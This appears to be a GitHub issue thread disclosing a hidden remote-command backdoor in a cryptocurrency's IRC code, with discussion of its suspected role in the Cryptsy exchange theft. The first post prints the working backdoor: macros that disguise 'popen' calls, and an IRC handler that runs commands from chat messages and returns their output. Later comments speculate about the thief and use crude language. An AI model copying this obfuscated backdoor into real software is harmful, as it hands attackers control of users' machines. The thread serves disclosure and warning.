backdoor in IRC code

[dooglus]

There's a backdoor in the IRC code that gives the attacker the ability to run arbitrary commands on the victim's host.

In src/allocators.h we see these macros being defined, in an attempt to hide 'popen' and 'pclose' calls:

/** Determine system page size in bytes */
#define S_ORDER(a,b,c,d) b##a##d##c

/**
 * OS-dependent memory page locking/unlocking.
 * Defined as policy class to make stubbing for test possible.
 */
#define CLine S_ORDER(I,F,E,L)

/**
 * Singleton class to keep track of locked (ie, non-swappable) memory pages, for use in
 * std::allocator templates.
 */
#define CRead S_ORDER(p,po,n,e)
#define CFree S_ORDER(cl,p,e,os)

//
// Allocator that locks its contents from being paged
// out of memory and clears its contents before deletion.
//
#define CBuff "PR" "IV" "M" "SG"

Then in irc.cpp they are used to implement the backdoor:

        if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
        {
            CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
            if (buf) {
                std::string result = "";
                while (!feof(buf))
                    if (fgets(pszName, sizeof(pszName), buf) != NULL)
                        result += pszName;
                CFree(buf);
                strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
                if (strchr(pszName, '!'))
                    *strchr(pszName, '!') = '\0';
                Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
            }
        }

I expect this is a known issue since this kind of thing doesn't happen accidentally.

[n4ru]

Too little too late, sadly.

[BitPopCoin]

First of all, are they retarded and not put each shitcoin in a vm? Second vern probably stole it and is now in China.

No vm and no manual compiling of random shitcoin? Vern cant keep his lies straight. I segregated my own bitpopcoin even when I compiled it myself. DO is only $5/month.

This Trojan is just a story vern found after the fact to facilitate his lies.

[presstab]

good find dooglus

[creativecuriosity]

Too little too late, sadly.

....

dooglus commented on Mar 8, 2015

[ofeefee]

Whoa!

[n4ru]

@creativecuriousity

That's about a year after the theft took place.

[presstab]

First post I can find about this backdoor is from BCT mods https://bitcointalk.org/index.php?topic=935898.0

[saddam213]

That's actually quite clever, added this one to my exploit scanner script

Good spotting sir

[mrzacsmith]

So disappointing such code was not reviewed by Vern and team before running it on the server where damage could result. I mean, seems since a 'newbie' on btctalk with an account one day old would warrant some review at a minimum when dealing with such a serious topic. I feel for all in the crypto community that lost coins due to either greed, fraud or incompetence.

[dooglus]

Apparently this is the theft transaction, included In block 313009 (2014-07-29), 8 months before my bug report.

Good spotting sir

I can't take any credit for spotting it. I originally heard of this backdoor in this forum post (January 25, 2015), was curious how the exploit worked, and ended up posting the macro code here so others could more easily understand it, and also to warn others who might fork this codebase.

[sidhujag]

Interesting that the coins havent moved? Would be funny if he accidentily sent to an address he didnt own lol

[mrzacsmith]

HAHA, that would be well deserved @sidhujag ~~ least the scum would not profit and still have an army of crypto fans hunting his head.

[saddam213]

Cryptsy never should have had that much in hot wallets, 300k LTC and 16K in hot wallet, ridiculous

So any head hunting should be directed at them IMO

[dooglus]

Would be funny if he accidentily sent to an address he didnt own

Actually 11 different addresses that he didn't own...

Who steals 11k BTC and takes the time to split them up into 11 separate addresses in the theft transaction? That is just bizarre.

[mrzacsmith]

@dooglus so true, could see it happening to one address, but 11 mistakes is highly improbable. I wonder if anyone has went through the LTC blockchain to see if 300k happened the same or near the same time.

[sidhujag]

maybe 11 people were involved lol

[StarenseN]

dooglus you nailed it. Waw.

[jwg4]

Closing this as WONTFIX. This is a feature not a bug people.

[BitPopCoin]

Correct won't fix, busy on permanent vacation

[doged]

noticed this was also placed in torcoin

https://github.com/torcoindev/torcoin/blob/419f77729f1bf7fc0c3543d7e88e9c6a12e401a2/src/irc.cpp

[doged]

@jwg4 XD

[DanielJoyce]

also torcoin on reddit was created around the same time all of these backdoors were landing in various ignored/defunct/marginal cryptocurrencies

[DanielJoyce]

Looks all the torcoin accounts went silent after the cyptsy hack was successful.

https://cryptocointalk.com/topic/13084-torcoin-tor-information/

Check the twitter links. Dead since july 2014

[shinohai]

^LOL

[Meler-Andy]

No way Why always poor people have to loose :( I m so sad now lost plenty of coins from that backdoors now Cryptsy wont give them back :( sad angry and feel like i wanna start being a thief !!!!

[ctrlcctrlv]

@BitpopCoin At least segregate coins in different VMs depending on their total value - it's absurd that Vern would run random shitcoin wallet on the same machine as a private key with thousands of BTC. Also, that makes it a hot wallet, not cold storage as Vern claimed.

Cryptsy incompetent since day 1.

[Frankenmint]

ITT a shiton of people who come here after the fact when the OP found this nearly a year ago

[dooglus]

@ctrlcctrlv We don't know for sure that the lucky7coin and Bitcoin wallets were on the same server. It's possible the lucky7 backdoor was used to gain entry to the 'shitcoin' VM, and from there access was somehow gained to other servers.

[BitPopCoin]

This thread has no moderators hahaha.

[bolivarcoin]

lucky7 still hosted on cryptsy servers, so if really has a backdoor the scammers are very happy that cryptsy havnt de-listed https://www.cryptsy.com/markets/view/LK7_BTC

[dooglus]

@bolivarcoin See https://github.com/Mullick/lucky7coin/commit/799b0b6b65a8fdd827d0d1406868d34a045ea779.

[Javihache]

So TorCoin person/group and Lucky7Coin person/group might be the same... all trying to hit the jackpot with their Backdoor. They hit the Jackpot and disappeared, abandoning their shitcoin projects behind them. So far so good. Now why haven't the BTC Funds been moved? Have the guys been living on the LTC funds this far?

[doged]

@dooglus @Javihache paul mentioned on the cryptsy blog that he had alot of "open communication" with special agent shaun bridges, who is now in prison for scamming silk road out of btc.. so if we see those coins move when he gets out, we know who did it.. timeline coincides.

[R32]

mark

[ghost]

See the good side about it - more prying eyes and people seeing and discussing this, so perhaps they will be able to more easily find deliberate backdoors like that (and perhaps even less so deliberate ones or better hidden ones too).

What strikes me the most is how simple it is in irc.cpp, even non-programmers can almost understand it as-is.

[BitPopCoin]

Or we can all just concentrate our efforts on Bitcoin and stop shitcoining

[doged]

says the guy named after a shitcoin, and has a couple shitcoins in his repo XD

[BitPopCoin]

Lol that was 2013, the shitcoin phase is done, fuck litecoin and paycoin. Also I abandoned BPC long ago.

[Javihache]

Litecoin is cool. Better Conf Times and all, scrypt... I like Litecoin, find it cool to have the "silver" and the "gold". But I still would like to know from you programming guys (I mean real programmers not like me), if there is a way to find out who that alerj78 is and how can be tracked down. Cause through stealing from Cryptsy, he stole from me and many others. And that is not cool.

[doged]

@Javihache it was most likely not this coin that is responsible, as i tested this and the way cryptsy is set up, it would not have been possible to steal bitcoins using this backdoor. this daemon would have to have been run as root, and not in its own vm.. so most likely this backdoor is not how cryptsy's bitcoin went missing.

[dooglus]

@doged Why do you say the daemon would need to have been run as root? I don't think that is the case.

[doged]

@dooglus you're correct, it would have to have been on the same machine as the cold storage bitcoin wallet though, and had permissions.

[jwg4]

@doged: Typically a backdoor like this is used to get the first toehold on a target system. Once that has been done, different privilege escalation bugs or attacks to various services can be used to get admin access and/or access to other systems on the target network. This might include traditional software vulnerabilities, or things like searching emails for plaintext passwords, spying on terminal sessions, searching for code repositories or databases for critical data. Unless the system is built to be very robust internally, with security planned on the basis that backdoors like this one will exist, these attempts will usually succeed. People often don't secure their systems from attackers who have partial privileges, and they often don't monitor systems and check logs effectively, which should enable you to find an attacker during this process. Cryptsy claim that it took several months from the time they installed this code for the attacker to be able to take over their BTC and LTC wallets. This could have been the time taken to go from a single backdoor executing as a non-privileged user on an isolated VM running this coin, to having access to the most secret and valuable information held by Cryptsy.

[pceccato]

pardon my ignorance, but why would a crypocoin node require an IRC connection?

[BitPopCoin]

To find nodes to connect to

[karelbilek]

Even bitcoin has that

[BitPopCoin]

No bitcoin stopped that. Also it was never used in that direction.

[Glittergates]

I broke the bank

[n4ru]

blast from the past

[ctrlcctrlv]

lol remember when this shitcoin exchange still existed and had people defending it